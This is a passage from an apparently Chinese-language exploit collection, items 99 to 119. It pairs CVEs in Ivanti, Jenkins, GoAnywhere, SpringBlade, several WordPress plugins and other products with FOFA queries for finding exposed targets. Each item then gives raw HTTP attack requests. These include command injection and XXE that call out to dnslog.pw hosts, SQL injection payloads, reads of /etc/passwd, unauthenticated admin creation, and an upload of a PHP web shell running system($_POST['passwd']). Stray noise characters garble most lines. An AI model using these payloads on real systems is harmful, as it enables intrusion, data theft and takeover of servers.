" k' M- r8 N8 I# X" }( y* nConnection: close
4 Q. {7 \. L' x! D( A+ r7 uContent-Length: 121
' D% F9 r+ H, W# TAccept: */*
. @4 W, E, l3 E% z( W; \Accept-Encoding: gzip, deflate" L v. j# x& j) q8 s) M5 x3 B) E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% }9 i3 y( k% S4 p0 l" M; l4 IContent-Type: application/x-www-form-urlencoded; charset=UTF-87 z+ q( d% S4 \8 n5 [* M
X-Requested-With: XMLHttpRequest# A% x' u" m7 H: @% W0 x
2 H5 F2 S9 S4 c& y
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
9 w( L$ z* o, }8 ~/ p; U
3 s: a9 |( W1 a6 Y) c) f0 t( H; J$ `$ A' N
99. Ncast盈可视高清智能录播系统busiFacade RCE
$ K' ^# H3 X+ H# a6 X; pCVE-2024-0305
8 I0 U+ Q3 [ i3 F: u, V, rFOFA:app="Ncast-产品" && title=="高清智能录播系统"8 W: ?0 r0 M1 Q. O% W
POST /classes/common/busiFacade.php HTTP/1.1
# S! J1 v( H. V0 Z( _Host: 192.168.40.130:80803 ?7 L% Y$ U m+ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0$ I6 [0 B4 n9 q9 B0 u- U
Connection: close3 P7 e1 ^3 G" k3 b% z
Content-Length: 154
! x0 u+ V) b+ R/ K; e7 Q) u- p: _Accept: */*
) J6 _5 c3 u. N7 d e+ E+ f4 E* Z `Accept-Encoding: gzip, deflate
$ O2 m# o1 }' ?. C8 n4 M& h4 u0 v" D3 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, H* m* x6 |# ]& b0 r# H
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
: `) J* t4 U8 B3 eX-Requested-With: XMLHttpRequest
& D& j( I4 n3 H c) @! L; j4 [: L. z- `
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
. U8 b! f, Y& B+ s9 V0 L6 N0 [
) T; Z( H1 @8 B9 D& i9 K6 i
' X' x. i0 H) N* ^0 ^$ r9 s100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传0 P3 \ v% E$ K# _+ W1 X6 S
CVE-2024-0352
! V7 m. Q: o! I$ f! v. GFOFA:icon_hash="874152924"
% D5 D( G5 m vPOST /api/file/formimage HTTP/1.1+ j( } Q3 H3 y0 D# T- {& ~
Host: 192.168.40.130$ L9 O- E6 G# z, ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36# P" x5 J% ` J' S
Connection: close( E6 Q$ E' j: {8 W
Content-Length: 2016 }6 e5 \, {2 M8 w. Y) j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
5 m; Z# a5 ^7 q, bAccept-Encoding: gzip
0 x9 c6 {* s& J7 E2 y4 ]$ r7 I; Z+ L) K7 Q: O3 B
------WebKitFormBoundarygcflwtei. L' e# r, W1 H$ y. W8 l% W
Content-Disposition: form-data; name="file";filename="IE4MGP.php"$ n+ i |$ I! x, Z+ y. @/ A
Content-Type: application/x-php
) {3 U$ R- F" _! [# B$ `
$ _. ~, f. D5 {+ A; w2ayyhRXiAsKXL8olvF5s4qqyI2O
( k2 H% v8 X d; j: |------WebKitFormBoundarygcflwtei--! a2 [% E' J! ^- G" k) q* K
" t8 w7 I% U: F/ l' B, T+ X
- [5 L4 O0 [$ W, l9 j2 S6 Z! r101. ivanti policy secure-22.6命令注入. s# [1 M* C: _+ O
CVE-2024-21887
; O$ N8 _& U4 VFOFA:body="welcome.cgi?p=logo"
+ c2 G* X' m+ bGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
9 q( ^* D8 k! |# q/ f' \) @Host: x.x.x.xx.x.x.x
/ |+ _6 y( X/ `8 E) jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' {: U3 R& V0 z' F' |
Connection: close
' C# b$ K7 a$ b, X& RAccept-Encoding: gzip6 `# A4 x N: g# Y/ X k9 M
9 t$ L5 M4 E1 T3 g4 p* J5 p
4 i& t* \' m9 a' a9 Y6 O
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行: a, F6 v8 d! N& \) n
CVE-2024-21893
/ \0 `8 |" [# A& ~0 u, UFOFA:body="welcome.cgi?p=logo"
9 I- Y1 T. x+ k! l! i ]3 CPOST /dana-ws/saml20.ws HTTP/1.1% u) d; Z; `" G- c
Host: x.x.x.x
# Q+ K. q- U& I/ k; `* t$ @; RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: Y& |9 P- x. W
Connection: close5 M$ y- o8 n! f1 O; z
Content-Length: 792
4 z1 B7 g1 K& kAccept-Encoding: gzip! n- ]" T0 y+ Q6 F, {/ J" \5 H
6 _" u8 l. b. ]% Z9 y4 H% N
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>6 y! A, {& E+ R) U$ Q' s
- H' b" |2 t l! @103. Ivanti Pulse Connect Secure VPN XXE1 q$ @1 F5 Q6 {; X
CVE-2024-22024 H* W/ f" X0 F) G2 d3 ~) a
FOFA:body="welcome.cgi?p=logo"% D8 @& _' @. t5 Y
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
( `! `! @) W( p1 g5 G/ i b, LHost: 192.168.40.130:111
* g( A' C8 d6 d( H- a0 |8 n$ nUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- o0 p! x* t. ^& F+ V- y, `, f: p
Connection: close
) g7 i, M. N6 }. cContent-Length: 204
& l2 C) O) i/ S$ O: |Content-Type: application/x-www-form-urlencoded
# R8 Z3 W% B0 k3 ?! JAccept-Encoding: gzip
& e& M% ?# ^. O' X* L) ?8 n8 n. j: b0 x: g/ i) _& M
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
1 Z) E' _# S( N& m
. G7 G1 U' C1 r5 J* Z2 s- ^7 B
% B) W1 M* v9 P. x其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
9 @/ c# J) l8 m# t- P, o<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
3 s' t6 c* I# ] m5 A8 C; z; m" E! ?+ c+ K ]/ e3 j( Q) D+ z
: e; q6 A$ M4 K8 a104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
3 T. O: }6 f4 lCVE-2024-0569
' m0 C" v( m+ l K4 E4 e& u9 YFOFA:title="TOTOLINK"
; m; }- U% {$ q' N+ m% i9 q% ~POST /cgi-bin/cstecgi.cgi HTTP/1.17 c" @. z D: c3 R7 J
Host:192.168.0.1
7 r7 K" h$ Q/ _$ q RContent-Length:41+ y0 ~0 x( B5 M7 H& r: n& I6 x1 X" j
Accept:application/json,text/javascript,*/*;q=0.01
2 K* D1 z+ P& bX-Requested-with: XMLHttpRequest3 B' Q7 \* R/ P/ g7 O
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
% }- F3 k: V8 ]7 TContent-Type: application/x-www-form-urlencoded:charset=UTF-8
+ S5 N, F& z& G" cOrigin: http://192.168.0.1/ ~, U+ r0 Y2 @* d* a B7 A( }7 p
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
" O. h& j0 j: i" V+ U0 v- pAccept-Encoding:gzip,deflate2 x* N8 j+ F6 O) s: C
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.79 W, v- r; i: E0 b8 k
Connection:close
: |; T" i' R+ E( P
( P8 Z5 t# g' k+ `{
$ x5 s- L* _: d. @) c; G"topicurl":"getSysStatusCfg",
7 ]6 H0 V8 V8 B& V8 Z% x( T5 v& a"token":""
! r3 O. t/ p/ _/ M}* [, } ?4 F3 Z$ h
! e! {: i+ N7 }: H105. SpringBlade v3.2.0 export-user SQL 注入
! K9 z5 x$ w4 I" V: t/ |FOFA:body="https://bladex.vip"
( g! T& M5 u. d4 Z) |http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
" m# H ^$ l( k8 p. ]
; o/ p" V, y& @106. SpringBlade dict-biz/list SQL 注入' [5 c) H& h- P( V& @) d+ N, ^
FOFA:body="Saber 将不能正常工作"& C d2 T" j1 r7 L2 M) l% g1 n
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
# O; h+ Q+ d# E. p( qHost: your-ip
, N# S) C5 d( ^7 u Y% ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! s% [. V8 ?0 _
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A& a7 r% m+ J! W9 D( B
Accept-Encoding: gzip, deflate! m3 N2 \/ g: @( G2 r
Accept-Language: zh-CN,zh;q=0.95 b3 c1 `) h/ e2 a
Connection: close
$ p+ |9 P6 Q, e& i5 {. b; u8 J% h6 U- E6 \2 r
8 @# y7 u/ i8 i9 j" ?0 ~: N
107. SpringBlade tenant/list SQL 注入5 ]9 B1 M5 ~7 n& s
FOFA:body="https://bladex.vip"
; C+ w$ Q5 g4 e& qGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.12 r7 ^1 u8 z6 K# M2 O3 \6 l
Host: your-ip
; f* x, c: T$ s( d; B* gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% N" P8 k! G2 o/ G! ?4 XBlade-Auth:替换为自己的. j, ?6 f4 S$ {2 O; U
Connection: close1 b3 ~8 P) s: N, h& h
, c* B! Z8 G0 A( S$ k
* _3 n0 b1 ]5 i7 B3 `7 @) L0 u2 I108. D-Tale 3.9.0 SSRF Y- m$ _/ n% D) e3 `/ Y' F" s
CVE-2024-21642
8 D, M% y* A: `9 ?2 MFOFA:"dtale/static/images/favicon.png"
( Q& m: ^1 ^9 E! y9 mGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
9 q* \. |. Q# rHost: your-ip
% ]1 o( x0 {7 s, y( LAccept: application/json, text/plain, */*2 n( Z8 i# C5 g0 P. [2 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 ?! x) l8 E+ @; `Accept-Encoding: gzip, deflate8 z$ U$ i: t; U7 c: x2 n z. g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
l: K3 a. B$ S% F& ]/ ]( sConnection: close! a3 b3 o2 S, Y+ K* q! J3 W
$ J2 y) u; n! }, C W# ~, i+ `+ p/ E" e# g
109. Jenkins CLI 任意文件读取
' |' y# O# X3 G$ m% H" sCVE-2024-23897: Q( c' Z3 R! V1 L8 `: u9 e4 j
FOFA:header="X-Jenkins"
8 \$ g) W9 h: t" U( n0 v, Y, KPOST /cli?remoting=false HTTP/1.1
9 j$ g/ G* e; h5 e: p! N( p% WHost:! S$ _: W/ S. ?& Q, c
Content-type: application/octet-stream
1 T* @$ l' F g; d! Y( Y7 d: W$ XSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
5 Q+ L0 ]0 s8 `3 d; S8 u* N1 oSide: upload
: e2 I1 v1 o6 @+ M3 qConnection: keep-alive
8 I% F: c' [4 Q1 v; O/ W5 H' I3 wContent-Length: 1633 ?, p' ^" e" n6 e! p
& ]; e& T2 ^" `
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
1 U2 P6 w! i) s/ t# U$ W
$ V# J1 u, Z4 |( y; R
3 M1 R6 ?. r$ a( R% HPOST /cli?remoting=false HTTP/1.1
# P. {' T1 m+ C" ?Host:2 a8 l% w- c$ D% Q3 k( [
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92* L0 u+ V- d3 |( M: t
download2 x$ A) k) Z4 z% M' R! h
Content-Type: application/x-www-form-urlencoded; k! M5 X2 F- h2 [9 U
Content-Length: 0
4 T) c. E- ~& p' X/ K/ [3 i- n! @( h
J! m- o: O& N/ }
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
7 {9 j2 r8 R' i3 C( zjava -jar jenkins-cli.jar help( f/ O0 [% x; H5 T
[COMMAND]) T/ ]5 E5 h- |( D, z5 `7 b
Lists all the available commands or a detailed description of single command.# A. L, w) Z, p D2 F+ R9 e
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)# C% K4 m: A. c! q( c2 W
8 t, @: S5 f2 @/ ?. \; n
* h( E1 y: }, ]/ ?110. Goanywhere MFT 未授权创建管理员1 I6 I E+ O8 X1 U: u
CVE-2024-0204
, u8 M0 l' L# y3 i5 zFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"* m; r- }7 j) K& f% l9 [8 c
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
3 d& w9 B S; u4 u# VHost: 192.168.40.130:8000/ X9 k. M# c6 x" b( I$ ?/ ~
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
$ ~1 M& u c* {5 w( eConnection: close# K Y0 c. z$ L7 D6 q8 u
Accept: */*
: ^. J, p% X/ k0 r8 ?2 z/ tAccept-Language: en! p) |0 N! k, u5 J! h. S- s; _
Accept-Encoding: gzip9 x8 p) g- [) |9 M2 v
! {8 d5 D8 G: u& u9 U/ w
4 J0 [2 e( b+ \# k/ Y. ?+ T
111. WordPress Plugin HTML5 Video Player SQL注入$ k; e C" e, Q: K
CVE-2024-1061
1 @1 s0 G8 y/ e0 Z! o# Y3 H2 ZFOFA:"wordpress" && body="html5-video-player"# w$ \2 I9 i3 D+ b# I
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.12 C8 G1 E! [* u, b8 P& v \
Host: 192.168.40.130:112+ _6 ]% y; w( b. o3 T3 L4 F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 N& f4 f% F0 t" q+ j1 H6 K" O7 v& w
Connection: close- ]1 T5 r8 ~( |3 D
Accept: */*4 c* i3 {- ]" \# r
Accept-Language: en4 V7 R; @ `1 H5 n b) ?
Accept-Encoding: gzip
" v3 B9 S3 P6 i& I$ X4 A
" X& I( ~. u Y' v5 w& e+ b2 M' r9 _& l5 i+ g
112. WordPress Plugin NotificationX SQL 注入
, t* O4 N* g. Y! t& OCVE-2024-1698
! m0 u3 p) M% q+ x/ @FOFA:body="/wp-content/plugins/notificationx"/ v- N8 B' V! W) h. E
POST /wp-json/notificationx/v1/analytics HTTP/1.1, W4 ?- F' z4 V5 C5 U
Host: {{Hostname}}
; c; K, {7 E. M. O: P% F$ iContent-Type: application/json
" J, `2 J6 r: m& A
1 K& ]9 Q8 r/ }4 L6 ^4 S{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
1 W: [+ ]' @: ~ a1 [5 ]: [( K3 c f& \+ H9 b' C
* h, E8 Z8 }( m113. WordPress Automatic 插件任意文件下载和SSRF
" u" I3 ~/ S3 q) _1 ?. vCVE-2024-27954 M) p# ]- ?6 O' H H% \
FOFA:"/wp-content/plugins/wp-automatic"
0 S8 d( N2 ^5 `% ]# S5 u! eGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1% ]2 E4 O' v! w: [* e
Host: x.x.x.x
3 h3 ^ z5 R' M5 p% J+ bUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
% A2 S. N `" z( _Connection: close- @! W; X( {! x4 y$ V5 Z# f
Accept: */*
9 J( U6 s! N0 w2 L- K/ ^ {! KAccept-Language: en
+ ]1 D4 B' v( g$ w* ^) dAccept-Encoding: gzip
6 v+ c5 @8 y% a2 k4 q' ?$ w5 c) H, R8 T7 n5 \" z
2 |+ ^$ A" [5 a4 j3 z' X
114. WordPress MasterStudy LMS插件 SQL注入9 ?) L) t: F( l3 v. [- f' S
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
9 m: T: b: D( C D- t% i# F3 fGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
# S+ m! C- h4 n* q" M/ AHost: your-ip
6 }6 P$ r8 b4 YUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 k; }5 t% A# a5 \& V( PAccept-Charset: utf-88 D4 {) h9 x6 j% F2 L$ Y
Accept-Encoding: gzip, deflate x6 C% b" [+ y5 C! {- \+ d1 P
Connection: close
; j$ f% L" o) o5 n3 A8 x0 I( n o/ G, k! i5 x
l1 I, C j2 T5 L7 b5 J) I' Y115. WordPress Bricks Builder <= 1.9.6 RCE1 ?1 T6 C9 x7 j2 _' |6 H
CVE-2024-25600
( j5 q2 U1 H/ y2 B' DFOFA: body="/wp-content/themes/bricks/"
% @5 p- U' Y6 d3 w& N$ k1 S* `4 T第一步,获取网站的nonce值6 Q; \' O& W, r$ J+ B1 B+ |
GET / HTTP/1.1
# \) m& O; r5 A( xHost: x.x.x.x7 R/ V2 R7 Y5 `7 H
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36. [$ z# x$ k' q% S0 I, N
Connection: close
. V, {& i/ F$ C' @6 eAccept-Encoding: gzip, ~" X4 d- \: k! o1 L2 q/ q- I4 _8 N
; ?$ _% ~$ K7 B ]3 S2 [
, U9 Y5 P% z) m# E5 A' s$ l5 f第二步替换nonce值,执行命令$ I' b& K6 n! V% y& p) @) f
POST /wp-json/bricks/v1/render_element HTTP/1.1
7 L, p, ~) p5 C# ?& V, b UHost: x.x.x.x% z1 Z$ Q! v2 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ C4 w! @1 N3 J) {9 x# s
Connection: close3 r8 i& H5 I# D, D8 x) l: E
Content-Length: 356
% W& a% H) v4 j. D4 e, r+ `Content-Type: application/json) t! ?9 V$ B5 a8 v9 f9 J# r% ~
Accept-Encoding: gzip. {" [1 K* g1 l0 [/ W# _* C- o
' h* y- \& y" g3 q+ a( K{9 F* q6 p5 R1 C- p- L
"postId": "1",
6 x' E3 m/ R4 T/ ]- L9 c "nonce": "第一步获得的值",
4 n% D3 K0 T8 `- B "element": {+ m; l+ Q8 Q( U: g
"name": "container",
( Y' \* R4 B7 |8 a "settings": {
7 J0 c( X1 A) H "hasLoop": "true",0 G1 \: z- t+ Q* C. G" R
"query": {
6 I( M1 ~! H9 I! y "useQueryEditor": true," L- j- R7 R3 d/ ?7 `1 Y! d4 t3 `
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
8 o* C& |; ^3 I( K- b; ] "objectType": "post"
: v) C' ]5 t5 H: [9 r }
& s4 l5 v4 a8 k. R$ J }" E0 U% z7 j# u) Y: k9 i& p( a1 y) |
}+ |0 y5 r. A. G( i9 g: V- ~% I
}
2 I1 F6 Q1 x: S
. {. B; R" `$ i9 k1 _; ?5 R" B! T, c
116. wordpress js-support-ticket文件上传
) ?) k# a2 b; q$ f$ m# z& TFOFA:body="wp-content/plugins/js-support-ticket"
. K3 E' ]8 j9 J6 T) UPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
) I: P( B& b. l! R aHost:
( f: O5 w" W0 eContent-Type: multipart/form-data; boundary=--------767099171, ?( c* a# Z( q9 a# k
User-Agent: Mozilla/5.04 u i* N4 {7 T% j3 z% J* z1 M4 W
6 u2 ~7 [" K1 \6 [2 X1 L----------767099171# P0 W5 v# ]6 |# n+ h- q, }
Content-Disposition: form-data; name="action") r, I* Y+ K1 \5 r+ Q0 e, [+ v* o
configuration_saveconfiguration$ ^( @, I' j ?6 d: R* q0 n+ ]
----------767099171
: s1 Y& y$ P6 O) K7 ]; m& g, h3 NContent-Disposition: form-data; name="form_request"' i6 J) ]! n$ `. j4 t ]) n
jssupportticket
x" N' o! Z A7 q& \7 k8 E/ P----------7670991714 Q- U% p% h1 m; m4 O/ P. s
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
- g$ k* e2 v2 h2 l; _( BContent-Type: image/png$ x" E# ~1 e6 u% V' V
----------767099171--
* M# D3 P. W3 ?
% t& N5 F; z/ S; \) N3 U! \5 e; z* T( N
117. WordPress LayerSlider插件SQL注入
& \3 Y+ q8 J' W5 }7 |version:7.9.11 – 7.10.0
! U% j: Y/ r& n' {8 a7 SFOFA:body="/wp-content/plugins/LayerSlider/"
! n+ y# ?; \, d3 N3 o) S5 EGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
+ D) g/ q+ l- z, o+ T# S5 `( AHost: your-ip/ p, g% l& Y+ d' W" X4 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" b2 Q y* d1 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 o+ [' E& w0 B! G. L, {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; F( k' ]/ Z+ r% kAccept-Encoding: gzip, deflate, br
- \* v' J0 F2 s5 wConnection: close
/ d6 L# a& n8 m" c5 y1 \Upgrade-Insecure-Requests: 1
0 Q! R7 u$ i" c. B5 K& ?% ^9 C& P) U4 q" W; c Q1 s5 Y& a
. v0 g6 ?, ~" }; L; _+ m118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
& @4 K& T$ s! r3 @CVE-2024-0939$ h) y' n5 j1 g6 K* n7 f* u
FOFA:title="Smart管理平台"
/ Q5 }- s9 k, V- ?POST /Tool/uploadfile.php? HTTP/1.1
3 @& b: r2 u9 {9 W+ e( G" L1 eHost: 192.168.40.130:8443
1 @& K" T z3 U, @0 W* g+ j4 A+ b8 ^/ zCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f88 a4 e7 g" }, i- g' }8 ?0 c$ X( O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
7 ^! G8 B# a E4 \7 C7 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( u: Z% s& \" o1 _! T1 Y- G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 M7 e% X4 X' ^2 U0 N. O
Accept-Encoding: gzip, deflate* N s. k- M" `9 [5 e5 M
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
4 C; f p% E* r& O0 ]Content-Length: 405* t4 R- c5 H8 i+ y
Origin: https://192.168.40.130:8443
4 [% p. g1 ]( q+ A, v% CReferer: https://192.168.40.130:8443/Tool/uploadfile.php' h; A' {5 W C# r
Upgrade-Insecure-Requests: 1
4 r+ ~' p; s8 O8 Q4 RSec-Fetch-Dest: document
3 k1 ]) d7 i) n8 l X+ BSec-Fetch-Mode: navigate
& R5 L* t t+ L. fSec-Fetch-Site: same-origin" H' c& K* y; _- P5 x
Sec-Fetch-User: ?1" D+ J! \1 T' `8 N4 _9 b8 ]3 J' D0 I% A
Te: trailers
+ |1 c( [; s9 q% x# j) T8 gConnection: close
h2 P$ r8 O; Q8 v+ D
. a# b3 [' n" u) B& n8 F-----------------------------13979701222747646634037182887" Y' {9 @% G) `% |
Content-Disposition: form-data; name="file_upload"; filename="contents.php"& ?0 n$ t2 D4 p! J* t
Content-Type: application/octet-stream
8 s m, L/ F0 S- A y# \9 u$ z( h, H9 v( ]7 ?
<?php
+ r0 n% [8 @. m5 b& S$ p: Osystem($_POST["passwd"]);5 t; F m& Y1 Y# C, X
?>" K3 |- V$ C7 D
-----------------------------13979701222747646634037182887
$ i* m5 z# ^0 F# ?7 b z9 bContent-Disposition: form-data; name="txt_path"
7 n: P# y, W* \' U( f- `% C4 j" T+ h! g3 e! s' j. m0 j) A1 r
/home/src.php0 \* C9 x0 }/ C7 \: M* @5 Y
-----------------------------13979701222747646634037182887--. e' {6 m; n0 ^) e% [2 y
) I4 S7 X8 @- L- A) r, L" h7 ^
- ^+ e) }( E" E- ~$ W访问/home/src.php
) c) v5 P ^8 D& r! d7 \1 c
; x: o, S( O& \" n4 {8 i } S! D119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 T) p( l3 R9 X/ ICVE-2024-1254
9 b9 m. f* D5 C! v k5 gFOFA:title="Smart管理平台"
4 C. G: Z$ o* Y& _先登录进入系统,默认账号密码为admin/admin
2 ]% r* K) m1 S' [8 hPOST /sysmanage/sysmanageajax.php HTTP/1.11
8 @* ~% |: a: ?* c4 {. V) ^Host: x.x.x.x
( @* z! s1 u1 P' J- mCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
5 g& `1 f/ {8 [6 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.03 B7 Q! Z u! |8 h# m1 m
Accept: */*
# u2 Y% p1 e7 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 c; J/ _/ e* S( H. l: c8 e4 g! ]
Accept-Encoding: gzip, deflate" f Y5 o# S8 p! G4 Z* p, `
Content-Type: application/x-www-form-urlencoded;
1 v }% V; K0 c$ B1 MContent-Length: 109
2 v6 E- L2 s" l3 d# N( O; c) B, tOrigin: https://58.18.133.60:8443
' c( X1 u0 s( EReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
; X. m% s% X6 [, E# ^/ s t; rSec-Fetch-Dest: empty
) J* W! w8 L$ Q# z3 n* B* eSec-Fetch-Mode: cors
